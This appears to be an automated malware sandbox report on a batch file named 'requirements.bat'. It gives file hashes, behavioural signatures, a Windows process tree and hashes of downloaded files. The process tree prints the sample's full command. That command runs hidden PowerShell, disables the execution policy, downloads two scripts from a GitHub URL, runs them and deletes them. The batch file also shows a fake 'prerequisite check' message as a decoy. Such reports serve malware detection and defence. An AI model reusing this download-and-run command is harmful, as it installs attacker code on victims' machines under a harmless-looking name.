Analysis
-
max time kernel
31s -
max time network
70s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
17-01-2024 19:24
Static task
static1
Behavioral task
behavioral1
Sample
requirements.bat
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
requirements.bat
Resource
win10v2004-20231215-en
General
-
Target
requirements.bat
-
Size
1KB
-
MD5
3cc7198c407f39e94ea792e5ef82a8ce
-
SHA1
1659e8a26c320f22f319952f626dd3081587b5b8
-
SHA256
8f75cc1e17cf0e2300197cc9dbb5f552e5b1654dfed023065195dcdc4e19f5c3
-
SHA512
0e6b5d2564d246379f36169e3513f8fd25acea8f340caf2ce254370563b0cd02a44ce0ea4a235b13157d1dbc99eb36685fdcf5996a8b0e3957aa3874e369d4ad
Malware Config
Signatures
-
Delays execution with timeout.exe 1 IoCs
pid Process 2776 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2116 powershell.exe 2740 chrome.exe 2740 chrome.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 2116 powershell.exe Token: SeShutdownPrivilege 2740 chrome.exe Token: SeShutdownPrivilege 2740 chrome.exe Token: SeShutdownPrivilege 2740 chrome.exe Token: SeShutdownPrivilege 2740 chrome.exe Token: SeShutdownPrivilege 2740 chrome.exe Token: SeShutdownPrivilege 2740 chrome.exe Token: SeShutdownPrivilege 2740 chrome.exe Token: SeShutdownPrivilege 2740 chrome.exe Token: SeShutdownPrivilege 2740 chrome.exe Token: SeShutdownPrivilege 2740 chrome.exe Token: SeShutdownPrivilege 2740 chrome.exe Token: SeShutdownPrivilege 2740 chrome.exe -
Suspicious use of FindShellTrayWindow 34 IoCs
pid Process 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe -
Suspicious use of SendNotifyMessage 32 IoCs
pid Process 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe 2740 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1616 wrote to memory of 1904 1616 cmd.exe 29 PID 1616 wrote to memory of 1904 1616 cmd.exe 29 PID 1616 wrote to memory of 1904 1616 cmd.exe 29 PID 1616 wrote to memory of 2116 1616 cmd.exe 30 PID 1616 wrote to memory of 2116 1616 cmd.exe 30 PID 1616 wrote to memory of 2116 1616 cmd.exe 30 PID 1616 wrote to memory of 2728 1616 cmd.exe 31 PID 1616 wrote to memory of 2728 1616 cmd.exe 31 PID 1616 wrote to memory of 2728 1616 cmd.exe 31 PID 2728 wrote to memory of 2776 2728 cmd.exe 33 PID 2728 wrote to memory of 2776 2728 cmd.exe 33 PID 2728 wrote to memory of 2776 2728 cmd.exe 33 PID 2740 wrote to memory of 2860 2740 chrome.exe 35 PID 2740 wrote to memory of 2860 2740 chrome.exe 35 PID 2740 wrote to memory of 2860 2740 chrome.exe 35 PID 2740 wrote to memory of 1788 2740 chrome.exe 37 PID 2740 wrote to memory of 1788 2740 chrome.exe 37 PID 2740 wrote to memory of 1788 2740 chrome.exe 37 PID 2740 wrote to memory of 1788 2740 chrome.exe 37 PID 2740 wrote to memory of 1788 2740 chrome.exe 37 PID 2740 wrote to memory of 1788 2740 chrome.exe 37 PID 2740 wrote to memory of 1788 2740 chrome.exe 37 PID 2740 wrote to memory of 1788 2740 chrome.exe 37 PID 2740 wrote to memory of 1788 2740 chrome.exe 37 PID 2740 wrote to memory of 1788 2740 chrome.exe 37 PID 2740 wrote to memory of 1788 2740 chrome.exe 37 PID 2740 wrote to memory of 1788 2740 chrome.exe 37 PID 2740 wrote to memory of 1788 2740 chrome.exe 37 PID 2740 wrote to memory of 1788 2740 chrome.exe 37 PID 2740 wrote to memory of 1788 2740 chrome.exe 37 PID 2740 wrote to memory of 1788 2740 chrome.exe 37 PID 2740 wrote to memory of 1788 2740 chrome.exe 37 PID 2740 wrote to memory of 1788 2740 chrome.exe 37 PID 2740 wrote to memory of 1788 2740 chrome.exe 37 PID 2740 wrote to memory of 1788 2740 chrome.exe 37 PID 2740 wrote to memory of 1788 2740 chrome.exe 37 PID 2740 wrote to memory of 1788 2740 chrome.exe 37 PID 2740 wrote to memory of 1788 2740 chrome.exe 37 PID 2740 wrote to memory of 1788 2740 chrome.exe 37 PID 2740 wrote to memory of 1788 2740 chrome.exe 37 PID 2740 wrote to memory of 1788 2740 chrome.exe 37 PID 2740 wrote to memory of 1788 2740 chrome.exe 37 PID 2740 wrote to memory of 1788 2740 chrome.exe 37 PID 2740 wrote to memory of 1788 2740 chrome.exe 37 PID 2740 wrote to memory of 1788 2740 chrome.exe 37 PID 2740 wrote to memory of 1788 2740 chrome.exe 37 PID 2740 wrote to memory of 1788 2740 chrome.exe 37 PID 2740 wrote to memory of 1788 2740 chrome.exe 37 PID 2740 wrote to memory of 1788 2740 chrome.exe 37 PID 2740 wrote to memory of 1788 2740 chrome.exe 37 PID 2740 wrote to memory of 1788 2740 chrome.exe 37 PID 2740 wrote to memory of 1788 2740 chrome.exe 37 PID 2740 wrote to memory of 1788 2740 chrome.exe 37 PID 2740 wrote to memory of 1788 2740 chrome.exe 37 PID 2740 wrote to memory of 2836 2740 chrome.exe 38 PID 2740 wrote to memory of 2836 2740 chrome.exe 38 PID 2740 wrote to memory of 2836 2740 chrome.exe 38 PID 2740 wrote to memory of 2896 2740 chrome.exe 39 PID 2740 wrote to memory of 2896 2740 chrome.exe 39 PID 2740 wrote to memory of 2896 2740 chrome.exe 39 PID 2740 wrote to memory of 2896 2740 chrome.exe 39 PID 2740 wrote to memory of 2896 2740 chrome.exe 39 PID 2740 wrote to memory of 2896 2740 chrome.exe 39 PID 2740 wrote to memory of 2896 2740 chrome.exe 39
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\requirements.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1616 -
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"2⤵PID:1904
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -WindowStyle hidden -Command "Set-ExecutionPolicy unrestricted -Force; Invoke-Webrequest 'https://raw.githubusercontent.com/imsneek/gudytevbuyde65yvyu3ev4w5y/main/putamadre.ps1' -OutFile main.ps1; .\main.ps1; Remove-Item main.ps1; Invoke-Webrequest 'https://raw.githubusercontent.com/imsneek/gudytevbuyde65yvyu3ev4w5y/main/mierda.ps1' -OutFile yes.ps1; .\yes.ps1; Remove-Item yes.ps1"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2116
-
-
C:\Windows\system32\cmd.execmd /k "echo Prerequisite check complete. Run web host file now. Server will be on localhost:8080&& timeout /t 10&&exit"2⤵
- Suspicious use of WriteProcessMemory
PID:2728 -
C:\Windows\system32\timeout.exetimeout /t 103⤵
- Delays execution with timeout.exe
PID:2776
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef7119758,0x7fef7119768,0x7fef71197782⤵PID:2860
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1140 --field-trial-handle=1288,i,12575232690769154624,5684329419936118630,131072 /prefetch:22⤵PID:1788
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1488 --field-trial-handle=1288,i,12575232690769154624,5684329419936118630,131072 /prefetch:82⤵PID:2836
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1584 --field-trial-handle=1288,i,12575232690769154624,5684329419936118630,131072 /prefetch:82⤵PID:2896
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2280 --field-trial-handle=1288,i,12575232690769154624,5684329419936118630,131072 /prefetch:12⤵PID:3040
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2288 --field-trial-handle=1288,i,12575232690769154624,5684329419936118630,131072 /prefetch:12⤵PID:1732
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1300 --field-trial-handle=1288,i,12575232690769154624,5684329419936118630,131072 /prefetch:22⤵PID:2192
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1316 --field-trial-handle=1288,i,12575232690769154624,5684329419936118630,131072 /prefetch:12⤵PID:1828
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3256 --field-trial-handle=1288,i,12575232690769154624,5684329419936118630,131072 /prefetch:82⤵PID:1044
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3600 --field-trial-handle=1288,i,12575232690769154624,5684329419936118630,131072 /prefetch:82⤵PID:1140
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3716 --field-trial-handle=1288,i,12575232690769154624,5684329419936118630,131072 /prefetch:82⤵PID:2032
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3792 --field-trial-handle=1288,i,12575232690769154624,5684329419936118630,131072 /prefetch:12⤵PID:1424
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3576 --field-trial-handle=1288,i,12575232690769154624,5684329419936118630,131072 /prefetch:12⤵PID:3020
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=2420 --field-trial-handle=1288,i,12575232690769154624,5684329419936118630,131072 /prefetch:12⤵PID:2684
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:460
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵PID:1084
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
264KB
MD5f50f89a0a91564d0b8a211f8921aa7de
SHA1112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
Filesize
4KB
MD584ec29093ba06409b1d1f6beebee6f93
SHA1b42d2fc8ec13019d58d1e748e2a252907a9dc17c
SHA256f1aac589c54fe81a5f1964e230ef6fe69cf6c8703f057ccb7ca41fd81543f234
SHA5128d72c7e93f3ed67c55dfc5bd4fa99a4eabd0bf97a5ea9da109365dfd84e64931a054487cd18385017bb1f6a261b30e67ed38046c206cdd2d1786ad16ee69d161
-
Filesize
4KB
MD54da182b658088d46749435fa58cd709e
SHA1d19e0c7b7b1ae82985621ea5edb4915d7703f26b
SHA256bd7294945cf35b42f6673cb3fc6c08724d6606c8ae76fa70af28cb2e77132f2e
SHA512ecebac63e4d6aa2bb77d767ab598a546ff4b2d625da1a4bfaba24f1d2fd264afe3441af61872350b73f5c72a88922fbdd984da2d174deccccae4301d5033bff0
-
Filesize
16B
MD518e723571b00fb1694a3bad6c78e4054
SHA1afcc0ef32d46fe59e0483f9a3c891d3034d12f32
SHA2568af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa
SHA51243bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2